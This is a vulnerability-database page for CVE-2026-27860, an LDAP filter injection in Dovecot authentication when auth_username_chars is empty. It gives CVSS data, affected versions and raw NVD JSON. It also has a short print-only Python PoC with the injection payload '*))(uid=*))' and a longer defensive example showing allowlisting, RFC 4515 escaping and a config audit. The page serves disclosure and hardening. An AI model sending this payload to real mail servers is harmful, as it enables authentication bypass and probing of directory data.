Security Vulnerability Report
CVE-2026-27860 CVSS 3.7 LOW

CVE-2026-27860

Published: 2026-03-27 09:16:20
Last Modified: 2026-04-29 19:26:19

Description

If auth_username_chars is empty, it is possible to inject an arbitrary LDAP filter into Dovecot's LDAP authentication. This potentially bypasses restrictions and allows probing of the LDAP structure. Do not clear out auth_username_chars, or install a fixed version. No publicly available exploits are known.

CVSS Details

CVSS Score: 3.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:dovecot:dovecot:*:*:*:*:*:*:*:* - VULNERABLE (versions before 2.4.3, per the CPE match data below)
cpe:2.3:a:open-xchange:dovecot:*:*:*:*:pro:*:*:* - VULNERABLE (versions before 3.1.4, per the CPE match data below)
Dovecot (for the exact affected versions, refer to the official security advisory; typically versions without the specific fix applied)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-27860
# Concept: Demonstrating how an empty auth_username_chars allows LDAP injection.
# This is a simulation of the payload structure; nothing is sent over the network.

# Target configuration (hypothetical)
host = '192.168.1.10'
port = 143  # IMAP port

# Malicious payload designed to bypass logic or probe structure
# If auth_username_chars is empty, this string is passed directly to the LDAP filter.
# Example payload: *))(uid=*))
# This attempts to make the filter always true or match specific attributes.
malicious_username = '*))(uid=*))'

# Simulation of the LDAP filter construction in Dovecot (vulnerable logic)
# Normal: (&(objectClass=posixAccount)(uid=%s))
# Vulnerable with empty auth_username_chars: the input is not sanitized.
constructed_filter = f"(&(objectClass=posixAccount)(uid={malicious_username}))"

print("[+] Constructing LDAP Filter with malicious input...")
print(f"[+] Filter: {constructed_filter}")

# If the server accepts this, it may return the first user entry or error out,
# leaking information about the LDAP structure.
print(f"[+] Payload sent: USER {malicious_username}")
print("[!] If auth_username_chars is empty, this may bypass restrictions or probe LDAP.")
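Added defensive companion to the description and the PoC above (example code written for this page, not code from the advisory, from Dovecot, or from the PoC author). It models the filter template the PoC shows and demonstrates the two controls that stop the payload from changing the filter's structure: a character allowlist, which is the role auth_username_chars plays, and RFC 4515 escaping of the assertion value. It also includes a small audit helper that flags an empty auth_username_chars in a Dovecot-style key = value config. The function names, the simple config parsing, and the default character set (modelled on the documented default, so treat it as an assumption and check the docs for your Dovecot version) are all assumptions of this example.

```python
# Added defensive example for CVE-2026-27860 (not from the advisory, Dovecot,
# or the PoC above). It models the filter construction the PoC describes and
# shows the two controls that neutralise the payload: a character allowlist
# (the role auth_username_chars plays) and RFC 4515 filter-value escaping.
import re
from typing import Iterable, Optional

# Filter template in the style the PoC above shows (constructed sample).
FILTER_TEMPLATE = "(&(objectClass=posixAccount)(uid={user}))"

# Allowlist modelled on the documented auth_username_chars default. Treat the
# exact set as an assumption and check the docs for your Dovecot version.
DEFAULT_USERNAME_CHARS = frozenset(
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.-_@"
)

# RFC 4515 section 3: characters that must be escaped inside an assertion value.
_LDAP_FILTER_ESCAPES = {
    "\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Escape a value for safe interpolation into an LDAP search filter."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def username_allowed(username: str, allowed: Iterable[str]) -> bool:
    """Allowlist check. An empty allowlist disables the check, which is the
    risky configuration the advisory warns about."""
    allowed = set(allowed)
    return not allowed or all(ch in allowed for ch in username)


def build_filter_unsafe(username: str) -> str:
    """Vulnerable construction: the username is interpolated verbatim."""
    return FILTER_TEMPLATE.format(user=username)


def build_filter_safe(username: str,
                      allowed: Iterable[str] = DEFAULT_USERNAME_CHARS) -> Optional[str]:
    """Hardened construction: reject disallowed characters, then escape the
    rest so that even an empty allowlist cannot change the filter structure.
    Returns None when the username is rejected."""
    if not username_allowed(username, allowed):
        return None
    return FILTER_TEMPLATE.format(user=escape_filter_value(username))


def count_uid_assertions(ldap_filter: str) -> int:
    """Number of '(uid=' assertions; the template has exactly one, so more
    than one means the input changed the filter's structure."""
    return ldap_filter.count("(uid=")


def audit_auth_username_chars(config_text: str) -> str:
    """Classify the auth_username_chars setting in a Dovecot-style key = value
    config: 'unset' (default applies), 'empty' (risky) or 'set'."""
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        match = re.match(r"auth_username_chars\s*=\s*(.*)$", line)
        if match:
            return "empty" if match.group(1).strip() == "" else "set"
    return "unset"


if __name__ == "__main__":
    payload = "*))(uid=*))"  # the payload shown in the PoC above
    print("unsafe :", build_filter_unsafe(payload))            # two (uid= assertions
    print("safe   :", build_filter_safe(payload))              # None: rejected by allowlist
    print("escaped:", build_filter_safe(payload, allowed=()))  # empty allowlist, still one assertion
    print("audit  :", audit_auth_username_chars("auth_username_chars =\n"))  # 'empty'
```

The allowlist is the primary control and is what the advisory's guidance (do not clear auth_username_chars) preserves; the escaping step is defence in depth for the case where the allowlist is disabled or contains filter metacharacters. The audit helper is a configuration check only and does not replace upgrading to a fixed version.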

References

https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0001.json (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27860", "sourceIdentifier": "[email protected]", "published": "2026-03-27T09:16:20.383", "lastModified": "2026-04-29T19:26:19.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "If auth_username_chars is empty, it is possible to inject arbitrary LDAP filter to Dovecot's LDAP authentication. This leads to potentially bypassing restrictions and allows probing of LDAP structure. Do not clear out auth_username_chars, or install fixed version. No publicly available exploits are known."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-90"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dovecot:dovecot:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.3", "matchCriteriaId": "BE209329-C5EA-4EE7-A23E-CD2EC061A9A4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:open-xchange:dovecot:*:*:*:*:pro:*:*:*", "versionEndExcluding": "3.1.4", 
"matchCriteriaId": "108C2329-C70B-4056-AB01-80AEB7CF3912"}]}]}], "references": [{"url": "https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}